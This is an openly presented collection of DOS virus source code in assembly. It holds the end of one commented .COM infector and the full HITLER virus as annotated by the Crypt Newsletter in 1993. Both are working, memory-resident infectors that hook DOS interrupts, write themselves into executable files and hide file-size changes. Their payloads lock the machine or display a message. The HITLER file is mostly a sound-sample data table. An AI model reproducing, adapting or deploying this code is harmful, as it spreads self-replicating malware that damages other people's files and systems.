mov ax,04bffh ;set ax to shell and execute. AL contains
;an invalid value which will be interpreted
;by the virus (int 21 is now trapped by it)
;and changed to 00.
cld ;clear direction flag
int 21h ;shell and re-execute the host program
mov dx,(endcode-begin)*2+0110h
;set dx to end of virus *2 plus 10. This
;will point to the end of the resident
;portion of the virus
int 27h ;terminate and stay resident
start: ;start of virus. The trapped INT 21 points
;to this location.
pushf ;store the flags
cmp ah,0deh ;is calling program checking for infection?
jne check4run ;no, continue on checking for execution
mov ah,0edh ;yes, change ah to 0edh
jmp cont ;jump over rest of viral code
check4run:
cmp ah,04bh ;check for program attempting to execute
je nextcheck ;yes, continue checks
jmp cont ;no, jump over rest of virus
nextcheck:
cmp al,0ffh ;check if virus is shelling. 0ffh will
;normally never be used and is used by
;the virus to shell the host before it is
;fully resident. This prevents the virus
;from shelling twice, which will work but
;lose the environment and cause problems.
jne workvirus ;normal DOS shell. Jump to virus meat.
xor al,al ;virus is shelling. zero al.
jmp cont ;jump over rest of virus
workvirus:
push ax ;store all registers subject to change
push bx
push cx
push es
push si
push di
push dx
push ds
push cs ;store the code segment so it can be used
push cs ;to set the ds and es registers
pop ds ;set ds to same as cs
pop es ;set es to same as cs
mov dx,080h ;set dx to offset 080h
mov ah,01ah ;set ah to create DTA
int 21h ;create DTA at 080h (normal DTA area)
pop ds ;set ds to original ds
pop dx ;set dx to original dx (ds:dx is used to
;point to the path and filename of the
;program to be executed)
push dx ;store these values back
push ds
xor cx,cx ;zero cx
mov ah,04eh ;set ah to search for filename match
int 21h ;search for filename (this is primarily
;done to setup data in the DTA so that it
;can be checked easier than making a
;number of individual calls)
push es ;store es (same as cs)
pop ds ;set ds to same as es and cs
cmp [byte 087h],'D' ;check for 'D' as seventh letter in file
jne j5
jmp endvirus ;if 'D' is 7th letter, dont infect
j5:
mov si,offset data3+0100h ;set source of bytes to compare
mov di,089h ;set destination of bytes to compare
mov cx,3 ;number of bytes to compare
cld ;compare forward
repe cmpsb ;compare bytes (check to see if file's
;extension is COM)
je j1
jmp endvirus ;not a COM file. Dont infect
j1:
mov bx,[word 009ah] ;set bx to length of file
cmp bx,1024 ;is length > 1024?
jae j2 ;yes, continue with checks
jmp endvirus ;no, dont infect
j2:
cmp bx,62000 ;is length < 62000?
jbe j3 ;yes, continue with checks
jmp endvirus ;no, dont infect
j3:
mov ax,[word 096h] ;set ax to file's time stamp
and ax,0000000000011111b ;clear everything but seconds
cmp ax,0000000000010100b ;is seconds = 40?
jne j4 ;yes, continue with infection
mov ah,02ah ;no, set ah to get the date
int 21h ;get current system date
mov cx,21 ;set cx to 21
cmp dl,29 ;is the date the 29th?
je irritate ;yes, continue with irritate
jmp endvirus ;no, let program execute normally
irritate:
mov dx,offset data5+0100h ;point dx to irritating message
mov ah,09h ;set ah to write to screen
int 21h ;write message 21 times
loop irritate
iret ;xfer program control to whatever's on
;the stack (this almost guarantee's a
;lockup and a reboot)
j4:
mov ax,[word 096h] ;set ax equal to the file's time stamp
and ax,1111111111100000b ;zero the seconds portion
or ax,0000000000010100b ;set the seconds = 40
add bx,0100h ;set bx = loc for restore routine (end
;of file once its in memory)
mov [word data1+0100h],bx ;store this value in the virus
mov bx,ax ;set bx = to adjusted time stamp
pop ds ;get the original ds
push ds ;store this value back
mov ax,04300h ;set ax to get the file's attributes
;ds:dx already points to path/filename
int 21h ;get the files attributes
push cx ;push the attributes
push bx ;push the adjusted time stamp
xor cx,cx ;zero cx(attributes for normal, read/write)
mov ax,04301h ;set ax to set file attributes
int 21h ;set files attributes to normal/read/write
mov ax,03d02h ;set ax to open file
int 21h ;open file for read/write access
mov bx,ax ;mov file handle to bx
push cs ;push current code segment
pop ds ;and pop into ds (ds=cs)
mov cx,endcode-begin ;set cx equal to length of virus
mov dx,offset endcode+0100h ;point dx to end of virus in memory
mov ah,03fh ;set ah to read from file
int 21h ;read bytes from beginning of file and
;store at end of virus. Read as many bytes
;as virus is long.
xor cx,cx ;zero cx
xor dx,dx ;zero dx
mov ax,04200h ;set ax to move file pointer from begin
int 21h ;mov file pointer to start of file
mov cx,endcode-begin ;set cx = length of virus
mov dx,0100h ;point dx to start of virus
mov ah,040h ;set ah to write to file
int 21h ;write virus to start of file
xor cx,cx ;zero cx
xor dx,dx ;zero dx
mov ax,04202h ;set ax to move file pointer from end
int 21h ;mov file pointer to end of file
mov cx,checkinfect-restcode ;set cx to length of restore routine
mov dx,offset restcode+0100h ;point dx to start of restore routine
mov ah,040h ;set ah to write to file
int 21h ;write restore routine to end of file
mov cx,endcode-begin ;set cx to length of virus (length of code
;read from beginning of file)
mov dx,offset endcode+0100h ;point dx to data read from file
mov ah,040h ;set ah to write to file
int 21h ;write data read from start of file to end
;of file following restore routine
pop cx ;pop the adjusted time stamp
mov dx,[word 098h] ;mov the file date stamp into dx
mov ax,05701h ;set ax to write time/date stamp
int 21h ;write time/date stamp to file
mov ah,03eh ;set ah to close file
int 21h ;close the file
pop cx ;pop the original attributes
pop ds ;pop the original ds
pop dx ;pop the original dx
push dx ;push these values back
push ds
mov ax,04301h ;set ax to set file attributes (ds:dx now
;points to original path/filename)
int 21h ;set the original attributes back to file
endvirus: ;virus execution complete. restore original
;values for INT 21 function
pop ds
pop dx
pop di
pop si
pop es
pop cx
pop bx
pop ax
cont: ;virus complete. restore original flags
popf
pushf
int21trap: ;this calls the original INT 21 routine
db 09ah ;opcode for a far call
nop ;blank area. the original INT 21 vector
nop ;is copied to this area
nop
nop
push ax ;after the original INT 21 routine has
;completed execution, control is returned
;to this point
push bx
pushf ;push the flags returned from the INT 21
;routine. We have to get them in the
;proper location in the stack when we
;return to the calling program
pop ax ;pop the flags
mov bx,sp ;set bx equal to the stack pointer
mov [word ss:bx+8],ax ;copy the flags to the proper location in
;the stack
pop bx ;restore bx
pop ax ;restore ax
iret ;return to calling program
signature:
db 'dex'
endcode: ;this file has been written as if it were
;a natural infection. At this point the
;virus is ended and we are at the restore
;routine. Following this is the host code
;which will be moved back to 0100h. This
;file could never actually be a natural
;infection however due to its small size
rep movsb ;start of restore routine. move host back
push cs ;set up to xfer to cs:0100h
mov ax,0100h
push ax
mov ax,cx ;zero ax
ret ;host is restored. xfer to start of host
hoststart: ;This is the host program. It consists
;merely of a simple message being displayed
jmp skipdata ;jump over message
hostmessage:
db 'The virus is now resident.$'
skipdata:
mov ah,09h ;set ah to write to screen
mov dx,offset hostmessage+0100h
;point dx to message to display
int 21h ;display message
mov ah,04ch ;set ah to terminate program
int 21h ;terminate program, return to DOS
END

718
MSDOS/Virus.MSDOS.Unknown.hitler.a86 Normal file
View File

@ -0,0 +1,718 @@
;The HITLER virus: commented in a rough 'n' ready way by the
;Crypt Newsletter staff for issue #11, January 1993.
;The HITLER virus is a memory resident .COM infector which adds itself
;to the end of infected files. HITLER employs
;minimal directory stealth.
;The minimal stealth allows the virus to subtract its file size from
;infected targets when the user takes a look at them using "dir"
;functions while the virus is in memory.
;Most of HITLER's code is devoted to a huge data table which is a voice
;sample of some nut shouting "HITLER." The virus ties the effect to
;the timer tick function, but if you want to hear it immediately, change the
;source were indicated. The resulting code will assemble under A86. On
;execution the virus will lock the PC into the voice effect until reboot,
;rendering it uninfective, if annoying. Not all PC's can generate the
;HITLER sound effect - some will just buzz.
call rakett ; recalculate offset
old db 'Í <20>!­' ; virus identification marker
rakett: pop bp
push bp
add bp,-103h
mov ax,42ABh ; check if virus installed
int 21h
jnc failed ; exit if here
cli
mov ax,3521h
int 21h ; get interrupt vector
mov w [bp+offset old21],bx ; es:bx points to
mov w [bp+offset old21+2],es ; interrupt handler
mov al,1Ch
int 21h
cli
mov w [bp+offset old1C],bx ; access timer tick int.
mov w [bp+offset old1C+2],es
mov w [bp+offset teller],16380 ; stuff our value into
sti ; "teller" buffer for
; later
call normalspeed ; eh?
mov si,ds
std
lodsb
cld
mov ds,si
xor bx,bx
mov cx,pgf
cmp b [bx],'Z'
jne failed
mov ax,[bx+3]
sub ax,cx
jc failed
mov [bx+3],ax
sub [bx+12h],cx
mov es,[bx+12h]
push cs
pop ds
mov di,100h
mov si,bp
add si,di
mov cx,size
rep movsb
push es
pop ds
mov ax,2521h
mov dx,offset ni21 ; set int 21 route through virus
int 21h
mov al,1Ch
mov dx,offset ni1C ; revector timer tick through
int 21h ; virus
failed: push cs
push cs
pop ds
pop es
pop si
mov di,100h
push di
movsw
movsw
movsb
mov cx,0FFh
mov si,100h
ret ; exit to host
findFCB: popf
call int21 ; look to virus "stealth"
pushf ; routine, now that int 21
or al,al ; comes through virus
jnz backFCB
call stealth
backFCB: popf
iret
stealth: push ax ; the following essentially massages the
push bx ; file control block on directory scans,
push dx ; subtracting the virus size from infected
push es ; files before the user sees 'em
mov ah,2Fh ; get disk transfer address
call int21 ;
cmp byte es:[bx],0FFh ; failed?
jne normFCB ; no, everything still OK
add bx,8
normFCB: mov al,byte es:[bx+16h] ; retrieve seconds attribute
and al,31 ; from observed file, if it's
xor al,31 ; 31, the file is infected
jnz shitFCB ; not 31 - file not infected
mov ax,word es:[bx+1Ch]
mov dx,word es:[bx+1Ch+2]
sub ax,size ; subtract virus length from
sbb dx,0 ; infected file
jc shitFCB ; no files? exit
mov word es:[bx+1Ch],ax
mov word es:[bx+1Ch+2],dx
shitFCB: ; restore everything as normal
pop es
pop dx
pop bx
pop ax
ret
ni21: pushf
cmp ah,11h ; any user access of the file control
je findFCB ; block must come through virus
cmp ah,12h ; ditto for here
je findFCB
cmp ax,42ABh ;
jne not_42AB
popf
clc
retf 2
not_42AB:
cmp ax,4B00h ; is a program being loaded?
jne not_4B00 ; exit if not
call install_24 ; install critical error handler
push ax
push bx
push cx
push dx
push ds
push bp
mov ax,4300h ; get file attributes of potential host
call int21
jc back1 ; failed? exit
mov cs:old_attr,cx ; stash attributes here
test cl,4 ; is the potential host a system file?
jnz back1 ; yes? so exit
mov ax,4301h ; set new file attributes, read or write
xor cx,cx
call int21
jc back1 ; error? exit
push dx
push ds
call infect ; begin infection stuff
pop ds
pop dx
mov ax,4301h
db 0B9h ;mov CX,...
old_attr dw 0
call int21
back1: ;go here if the attrib-get fails
pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call remove_24 ; normalize critical error handler
not_4B00:
back: popf
db 0EAh
old21 dw 0,0
int21: pushf
call dword ptr cs:old21
ret
infect: mov ax,3D02h ; open host file with read/write access
call int21
jnc okay_open
bad1: ret ; was there an error? exit
okay_open: xchg bx,ax
mov ax,5700h ; get file date and file time
call int21
push cx
mov bp,sp
push dx
mov ah,3Fh ; read first five bytes from potential host
mov cx,5
mov dx,offset old ; store them here
push cs
pop ds
call int21
jc close ; error, exit?
cmp al,5 ; get the five bytes?
jne close ; no, so exit
cmp word old[0],'MZ' ; is this an .EXE file?
je close ; yes, so go away
cmp word old[0],'ZM' ; double-check, is this an .EXE file?
je close ; yes, so go away
cmp old[0],0E9h ; does it start with a jump?
jne infect1 ; no - infect!
cmp word old[3],'­!' ; does it start with the HITLER virus
jne infect1 ; marker? If no, infect!
; (Boy, this fellow is careful!)
close: pop dx
pop cx
mov ax,5701h ; reset file date and time
call int21
mov ah,3Eh ; close file
call int21
ret
infect1: mov ax,4202h ; reset pointer to end of file
xor cx,cx
xor dx,dx
call int21
or dx,dx
jnz close
cmp ax,59000 ; compare .COMfile size to 59,000 bytes
jae close ; greater than or equal? close file
; HITLER is a big virus, so we don't want to
dec ax ; exceed the DOS execution boundary for .COM
dec ax ; files
dec ax
mov word ptr putjmp[1],ax
mov ah,40h ; write HITLER to the target file
mov cx,size ; length in CX
mov dx,100h
call int21
jc close
cmp ax,size ; again, we're being real careful
jne close ; not to infect ourself
mov ax,4200h ; set file pointer to beginning of host
xor cx,cx
xor dx,dx
call int21
mov ah,40h ; write the first five bytes of the
mov cx,5 ; viral jump and ID strings to the
mov dx,offset putjmp ; beginning of the host file
call int21
or byte ss:[bp],31 ; set the seconds field to 31, so the
; "stealth" routine has its cue
jmp close ; close the file and clean up
putjmp db 0E9h
dw 0
db '!­'
install_24: pushf ; installation of critical error
cli ; handler (no shit, Sherlock!)
push bx
push ds
xor bx,bx
mov ds,bx
push ds
lds bx,[24h*4]
mov cs:old24[0],bx
mov cs:old24[2],ds
pop ds
mov word [(24h*4)],offset ni24
mov [(24h*4)+2],cs
pop ds
pop bx
sti
popf
ret
remove_24: pushf ; remove it
cli
push bx
push es
push ds
xor bx,bx
mov ds,bx
les bx,cs:old24[0]
mov [(24h*4)],bx
mov [(24h*4)+2],es
pop ds
pop es
pop bx
sti
popf
ret
errflag db 0
db 'Hitler Virus by Dreamer/DY',0 ; ID note by Dreamer of Demoralized
; Youth
ni24: mov al,3
mov cs:errflag,1
iret
old24 dw 0,0
xofs dw offset sample
len equ 4131
divisor equ 230
teller dw 16380 ; "new" timer tick values for viral
; trigger
ni1C:
cli
pushf
push ax
push ds
push si
push cs
pop ds
; -lobotomize code from here to marker to get HITLER at start
cmp teller,0 ; compare 0 with the value the virus
je teller_ok ; stuffed into the timer tick interrupt
dec teller ; if equal - do "HITLER!" thing, if not
jmp noreset ; decrement the value
; -bottom of lobotomy marker
teller_ok: ; sound routine to the IBM internal speaker
mov al,34h
db 0E6h,43h ;out 43h,al
mov al,divisor
db 0E6h,40h ;out 40h,al
mov al,0
db 0E6h,40h ;out 40h,al
mov al,090h
db 0E6h,43h ;out 43h,al
mov si,xofs
lodsb
db 0E6h,42h ;out 42h,al
db 0E4h,61h ;in al,61h
or al,3
db 0E6h,61h ;out al,61h
inc xofs
cmp xofs,len+offset sample ; points to the huge table at
jb noreset ; the end of the virus, a
mov xofs,offset sample ; .VOC sample of some nut
noreset: ; shouting "HITLER!"
sti
pop si
pop ds
pop ax
popf
db 0EAh
old1C dw 0,0
normalspeed: cli
push ax
mov al,34h
db 0E6h,43h
mov al,0
db 0E6h,40h
db 0E6h,40h
pop ax
sti
ret
sample:
db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h
db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h
db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h
db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah
db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh
db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h
db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh
db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h
db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh
db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h
db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h
db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h
db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah
db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h
db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh
db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h
db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh
db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh
db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah
db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch
db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h
db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h
db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h
db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h
db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h
db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h
db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh
db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h
db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h
db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h
db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh
db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h
db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h
db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h
db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h
db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h
db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h
db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh
db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h
db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh
db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh
db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h
db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh
db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh
db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h
db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh
db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh
db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h
db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h
db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah
db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h
db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h
db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h
db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh
db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h
db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h
db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h
db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h
db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh
db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h
db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h
db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h
db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh
db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h
db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh
db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh
db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah
db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h
db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h
db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh
db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h
db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh
db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh
db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h
db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh
db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h
db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah
db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah
db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h
db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch
db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h
db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h
db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h
db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h
db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h
db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah
db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h
db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh
db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h
db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h
db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah
db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h
db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h
db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh
db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h
db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh
db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h
db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h
db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch
db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h
db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh
db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah
db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh
db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h
db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh
db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah
db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh
db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h
db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h
db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh
db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h
db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah
db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h
db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h
db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h
db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h
db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h
db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h
db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h
db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h
db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h
db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h
db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h
db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh
db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h
db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h
db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h
db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh
db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh
db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h
db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h
db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh
db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh
db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh
db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh
db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h
db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah
db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h
db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh
db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h
db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h
db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h
db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h
db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh
db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h
db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh
db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h
db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h
db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h
db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh
